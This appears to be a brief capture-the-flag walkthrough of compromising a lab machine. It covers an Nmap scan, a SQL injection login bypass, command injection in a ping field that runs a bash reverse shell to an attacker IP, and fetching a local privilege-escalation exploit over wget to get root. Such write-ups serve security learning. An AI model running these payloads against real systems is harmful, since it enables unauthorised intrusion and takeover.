We start by scanning the host by Nmap:
Namp the host with namp –A –T4 –p- <ip> -vvs

Visit the page on port 80 required admin login and password …
from nmap scan we can see mysql databaseI
using a sql injection code (admin’ or ‘1’=’1’#) in the username page and got through


in the ping part we can inserted bash -i >& /dev/tcp/<192.168.1.9>/<4444> 0>&1 to get a shell bash to the server

stight to privilege escalate run the command cat /etc/*-release

as we can see here the version which we can search for an exploit on google or just by using Searchsploit

i downloaded the exploit to my drive then started a SimpleHTTPServer to upload the exploit to the host

cd to the tmp folder and start a Wget command to download to patch file

Compile the file and run it … check for root
